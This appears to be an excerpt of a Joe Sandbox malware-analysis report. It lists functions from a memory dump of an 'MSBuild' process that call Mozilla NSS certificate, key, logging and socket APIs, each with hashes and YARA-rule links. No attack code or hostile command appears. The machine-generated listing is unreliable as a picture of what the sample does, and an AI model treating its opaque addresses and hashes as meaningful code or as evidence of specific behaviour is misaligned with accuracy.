Part of subcall function 6CB73090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CB7312B
Part of subcall function 6CB73090: PK11_DestroyObject.NSS3(?,?), ref: 6CB73154
Part of subcall function 6CB73090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB7317E

SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6CB699FF,?,?,?,?,?,?,?,?,?,6CB62D6B,?), ref: 6CB8AE67
SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6CB699FF,?,?,?,?,?,?,?,?,?,6CB62D6B,?), ref: 6CB8AE7E
SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6CB62D6B,?,?,00000000), ref: 6CB8AE89
PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6CB62D6B,?,?,00000000), ref: 6CB8AE96
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6CB62D6B,?,?), ref: 6CB8AEA3

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
String ID:
API String ID: 754562246-0
Opcode ID: 8f7bd68c87926a1c9bfd0e0b711c599cdcfb25e735071931d8c2db2dc142f407
Instruction ID: e9bc2f16a98c46e9d5ecdd9f0ff22ca133fadc482b7101345e7b9923c3ae832b
Opcode Fuzzy Hash: 8f7bd68c87926a1c9bfd0e0b711c599cdcfb25e735071931d8c2db2dc142f407
Instruction Fuzzy Hash: 33012866B020E0D7E701912CEC85BAF3158CB9765EF180831ED16D7B81FA22E9054BF3

Function 6CC7ADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6CC7A6D8), ref: 6CC7AE0D
free.MOZGLUE(?), ref: 6CC7AE14
DeleteCriticalSection.KERNEL32(6CC7A6D8), ref: 6CC7AE36
free.MOZGLUE(?), ref: 6CC7AE3D
free.MOZGLUE(00000000,00000000,?,?,6CC7A6D8), ref: 6CC7AE47

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: b9a55ec881221efc5a53797ea3a34ea251873d528d1e9f2fd6ed989541175760
Instruction ID: 8ad185585eb6244f09f9b76ea2467402f594c7c7e11f433a85a889adbf25cf2c
Opcode Fuzzy Hash: b9a55ec881221efc5a53797ea3a34ea251873d528d1e9f2fd6ed989541175760
Instruction Fuzzy Hash: FFF096B5201A01ABCB109FA8D8489577778FF867757144328F53A93940E731E165C7E9

Function 6CAF6C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6CAF6D36

Strings

database corruption, xrefs: 6CAF6D2A
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CAF6D20
%s at line %d of [%.10s], xrefs: 6CAF6D2F

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: c1b5f7845376025636f6b7b53e50eee035ca5526f13009c798c380cad4b94162
Instruction ID: 8cfa28b0635e53a8d76eec3758193c1ce5edd26c34faedcb744c22cee3cb53ed
Opcode Fuzzy Hash: c1b5f7845376025636f6b7b53e50eee035ca5526f13009c798c380cad4b94162
Instruction Fuzzy Hash: 5B210631604B059BC720CE19D941B5AB7F2AF84308F14852CE8699BF51E371F98AC7A1

Function 6CC2CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6CC2CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CC2CC7B), ref: 6CC2CD7A
Part of subcall function 6CC2CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CC2CD8E
Part of subcall function 6CC2CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CC2CDA5
Part of subcall function 6CC2CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CC2CDB8

PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6CC2CCB5
memcpy.VCRUNTIME140(6CCC14F4,6CCC02AC,00000090), ref: 6CC2CCD3
memcpy.VCRUNTIME140(6CCC1588,6CCC02AC,00000090), ref: 6CC2CD2B

Part of subcall function 6CB49AC0: socket.WSOCK32(?,00000017,6CB499BE), ref: 6CB49AE6
Part of subcall function 6CB49AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6CB499BE), ref: 6CB49AFC

Part of subcall function 6CB50590: closesocket.WSOCK32(6CB49A8F,?,?,6CB49A8F,00000000), ref: 6CB50597

Strings

Ipv6_to_Ipv4 layer, xrefs: 6CC2CCB0

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
String ID: Ipv6_to_Ipv4 layer
API String ID: 1231378898-412307543
Opcode ID: 6f91631eb574857ebfa7b1f618895800c34c627d6a41072689c5cf698eb42807
Instruction ID: 332e1463d55707daec888456f7b7bf34926fe3f61b0d5dfa000f22aa66d3e499
Opcode Fuzzy Hash: 6f91631eb574857ebfa7b1f618895800c34c627d6a41072689c5cf698eb42807
Instruction Fuzzy Hash: CE115BF2B002409EEB209F6FDC56B863BB8E746298F141029E506CBB41F775C6148BE6

Function 6CB92520 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetFunctionList), ref: 6CB92538
PR_LogPrint.NSS3( ppFunctionList = 0x%p,?), ref: 6CB92551

Part of subcall function 6CC709D0: PR_Now.NSS3 ref: 6CC70A22
Part of subcall function 6CC709D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CC70A35
Part of subcall function 6CC709D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CC70A66
Part of subcall function 6CC709D0: PR_GetCurrentThread.NSS3 ref: 6CC70A70
Part of subcall function 6CC709D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CC70A9D
Part of subcall function 6CC709D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CC70AC8
Part of subcall function 6CC709D0: PR_vsmprintf.NSS3(?,?), ref: 6CC70AE8
Part of subcall function 6CC709D0: EnterCriticalSection.KERNEL32(?), ref: 6CC70B19
Part of subcall function 6CC709D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CC70B48
Part of subcall function 6CC709D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CC70C76
Part of subcall function 6CC709D0: PR_LogFlush.NSS3 ref: 6CC70C7E

Strings

ppFunctionList = 0x%p, xrefs: 6CB9254C
C_GetFunctionList, xrefs: 6CB92533

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: PrintR_snprintf$CriticalCurrentDebugEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime
String ID: ppFunctionList = 0x%p$C_GetFunctionList
API String ID: 1907330108-525396629
Opcode ID: e8ce757ee1d1804f13f25efb1ed11e149788be0e0746da92d7cc2ed5889bb757
Instruction ID: 742b3a843a9f5c9b74492cf150d3b65d2e817c21371b5788da576a89a3f304c3
Opcode Fuzzy Hash: e8ce757ee1d1804f13f25efb1ed11e149788be0e0746da92d7cc2ed5889bb757
Instruction Fuzzy Hash: FE0175B5B011C09FDB109B68D95DB5937B5EB8331AF054035E505D3A11EB34DE8ACBA3

Function 6CC78530 Relevance: 6.1, APIs: 4, Instructions: 127threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6CCC14E4,6CC2CC70), ref: 6CC78569
gethostbyaddr.WSOCK32(?,00000004,00000002), ref: 6CC785AD
GetLastError.KERNEL32(?,00000004,00000002), ref: 6CC785B6
PR_GetCurrentThread.NSS3(?,00000004,00000002), ref: 6CC785C6

Part of subcall function 6CB50F00: PR_GetPageSize.NSS3(6CB50936,FFFFE8AE,?,6CAE16B7,00000000,?,6CB50936,00000000,?,6CAE204A), ref: 6CB50F1B
Part of subcall function 6CB50F00: PR_NewLogModule.NSS3(clock,6CB50936,FFFFE8AE,?,6CAE16B7,00000000,?,6CB50936,00000000,?,6CAE204A), ref: 6CB50F25

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: CallCurrentErrorLastModuleOncePageSizeThreadgethostbyaddr
String ID:
API String ID: 4254312643-0
Opcode ID: c1f37f9c5e8e5bf65cea54fe1914c8ebb30460cf2c8846c52741e40ac0296819
Instruction ID: 9bb04f0d2e5cc5572efa5690bac6c2ebe3fb9a5cccb2a7e91001876aaf063dae
Opcode Fuzzy Hash: c1f37f9c5e8e5bf65cea54fe1914c8ebb30460cf2c8846c52741e40ac0296819
Instruction Fuzzy Hash: 1F41E870A08346ABEB348A36C854B55B7B4FB4532CF08472BCA1663EC1F7749994C7E1

Function 6CC24FF0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6CB085D2,00000000,?,?), ref: 6CC24FFD
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CC2500C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CC250C8
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CC250D6

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: _byteswap_ulong
String ID:
API String ID: 4101233201-0
Opcode ID: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction ID: ecb717165b2e9d52d7e1a91c234c765a67c3160517fd9842b1faf63e3df3dd78
Opcode Fuzzy Hash: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction Fuzzy Hash: 52414CB2A402158FCB18CF18DC917AAB7E1BF4431871D466DD84ACBB06F779E891CB91

Function 6CBB0420 Relevance: 6.1, APIs: 4, Instructions: 117memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000000,?,6CB9C97F,?,?,?), ref: 6CBB04BF
TlsGetValue.KERNEL32(00000000,?,6CB9C97F,?,?,?), ref: 6CBB04F4
EnterCriticalSection.KERNEL32(?,?,?,6CB9C97F,?,?,?), ref: 6CBB050D
PR_Unlock.NSS3(?,?,?,?,6CB9C97F,?,?,?), ref: 6CBB0556

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Alloc_CriticalEnterSectionUnlockUtilValue
String ID:
API String ID: 349578545-0
Opcode ID: ded71f77478319dd0cf71acddaad6e27a95bfc492a84064530192ddda9ff8a31
Instruction ID: 4558009a95290a8b740257797d88b5201122105fefe8bd29cb1963db78ba7f19
Opcode Fuzzy Hash: ded71f77478319dd0cf71acddaad6e27a95bfc492a84064530192ddda9ff8a31
Instruction Fuzzy Hash: E34169B0A057868FDB04DF29D680679BBF4FF44318F14856DD89A9BB01EB30E891CB91

Function 6CB66C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CB66C8D
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CB66CA9
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CB66CC0
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6CC88FE0), ref: 6CB66CFE

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Util$Alloc_Arena$EncodeItem_memset
String ID:
API String ID: 2370200771-0
Opcode ID: 6a271f3b94557776c52005c92e672183e8abd752070449b566ddc9479933021c
Instruction ID: d2bb76eec0e4e1066b3ac512d4b5a9b8d8e61a60dbf426f4d6d8182959f8327c
Opcode Fuzzy Hash: 6a271f3b94557776c52005c92e672183e8abd752070449b566ddc9479933021c
Instruction Fuzzy Hash: C331A1B5A002169FDB08CF66C891ABFBBF9EF85248B10443DD905E7B40EB31D905CBA1

Function 6CBD6DE0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

PR_MillisecondsToInterval.NSS3(?), ref: 6CBD6E36
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CBD6E57

Part of subcall function 6CC0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC0C2BF

PR_MillisecondsToInterval.NSS3(?), ref: 6CBD6E7D
PR_MillisecondsToInterval.NSS3(?), ref: 6CBD6EAA

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: IntervalMilliseconds$ErrorValue
String ID:
API String ID: 3163584228-0
Opcode ID: 271c5e7654859fa13c0f3f0591e2700a32fb3fb4e52a722952dadde47ada4944
Instruction ID: 2e3d3eacb497c9f63e319e9c3771954fc661fc3d10a3ab5e0e2ee0e9fbff5ed1
Opcode Fuzzy Hash: 271c5e7654859fa13c0f3f0591e2700a32fb3fb4e52a722952dadde47ada4944
Instruction Fuzzy Hash: 2E319171610693EFDB145F34DC043A6B7A4EB1131AF120E3DD499D6A41EB317958CF82

Function 6CBC8530 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,?,6CBC72EC), ref: 6CBC855A

Part of subcall function 6CBC07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CB68298,?,?,?,6CB5FCE5,?), ref: 6CBC07BF
Part of subcall function 6CBC07B0: PL_HashTableLookup.NSS3(?,?), ref: 6CBC07E6
Part of subcall function 6CBC07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CBC081B
Part of subcall function 6CBC07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CBC0825

PORT_ArenaGrow_Util.NSS3(?,00000000,?,00000001,?,?,6CBC72EC), ref: 6CBC859E
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6CBC72EC), ref: 6CBC85B8
PR_SetError.NSS3(FFFFE005,00000000,?,6CBC72EC), ref: 6CBC8600

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: ErrorUtil$ArenaHashLookupTable$Alloc_ConstFindGrow_
String ID:
API String ID: 1727503455-0
Opcode ID: c3976de85504193724a61ee596be12a747b852d478c2b9224f3d669c07c31240
Instruction ID: f940f22023f12c8d7473a39a83f56104e99ecd8fd58fcdc745910dae49952ef6
Opcode Fuzzy Hash: c3976de85504193724a61ee596be12a747b852d478c2b9224f3d669c07c31240
Instruction Fuzzy Hash: B521B072B002519BE7008F2DDC40B2B76AAEF8131DF65412AEC65D7750EBB2DC0687A7

Function 6CB66420 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000,00000001,00000000,00000000,?,?,6CB65DEF,?,?,?), ref: 6CB66456
CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001,00000001,00000000,00000000,?,?,6CB65DEF,?,?,?), ref: 6CB66476
CERT_DestroyCertificate.NSS3(00000000,?,?,?,?,?,?,6CB65DEF,?,?,?), ref: 6CB664A0
PR_SetError.NSS3(FFFFE020,00000000,00000001,00000000,00000000,?,?,6CB65DEF,?,?,?), ref: 6CB664C2

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: CertificateError$DestroyTemp
String ID:
API String ID: 3886907618-0
Opcode ID: 69f7a8026667b2e723c64be03bd8d7d7b0b57e47e95c4ffce8af3ad3ba9e6179
Instruction ID: 568c7b3a2974d8d49cbfba857eaaaccf6ffb698f3d89d09aaaed4bddd9555ebf
Opcode Fuzzy Hash: 69f7a8026667b2e723c64be03bd8d7d7b0b57e47e95c4ffce8af3ad3ba9e6179
Instruction Fuzzy Hash: AC21E4B1A01341ABEB209F2ADC45B6776E8EB40308F144938F919C7F41F7B2D958C7A2

Function 6CBA4FB0 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6CBAB60F,00000000), ref: 6CBA5003
EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6CBAB60F,00000000), ref: 6CBA501C
PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6CBAB60F,00000000), ref: 6CBA504B
free.MOZGLUE(?,00000000,00000000,00000000,?,6CBAB60F,00000000), ref: 6CBA5064

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValuefree
String ID:
API String ID: 1112172411-0
Opcode ID: 30fe6cd7db2b3f2bb1bc74bc2211ea989ec608e0e0584477cc4e30d0e49c4fcd
Instruction ID: 0a53351856d59b54c24d3edc368809958d75176db9395fdb99ec3bfdc3e55e38
Opcode Fuzzy Hash: 30fe6cd7db2b3f2bb1bc74bc2211ea989ec608e0e0584477cc4e30d0e49c4fcd
Instruction Fuzzy Hash: 09314BB0A09A46CFDB00EFA9C48456ABBF4FF08308F108569D899D7701E730E995CBD6

Function 6CBB4590 Relevance: 6.1, APIs: 4, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000008,?,6CBB473B,00000000,?,6CBA7A4F,?), ref: 6CBB459B

Part of subcall function 6CBC0BE0: malloc.MOZGLUE(6CBB8D2D,?,00000000,?), ref: 6CBC0BF8
Part of subcall function 6CBC0BE0: TlsGetValue.KERNEL32(6CBB8D2D,?,00000000,?), ref: 6CBC0C15

TlsGetValue.KERNEL32(?,?,6CBB473B,00000000,?,6CBA7A4F,?), ref: 6CBB45BF
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6CBB473B,00000000,?,6CBA7A4F,?), ref: 6CBB45D3
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,6CBB473B,00000000,?,6CBA7A4F,?), ref: 6CBB45E8

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
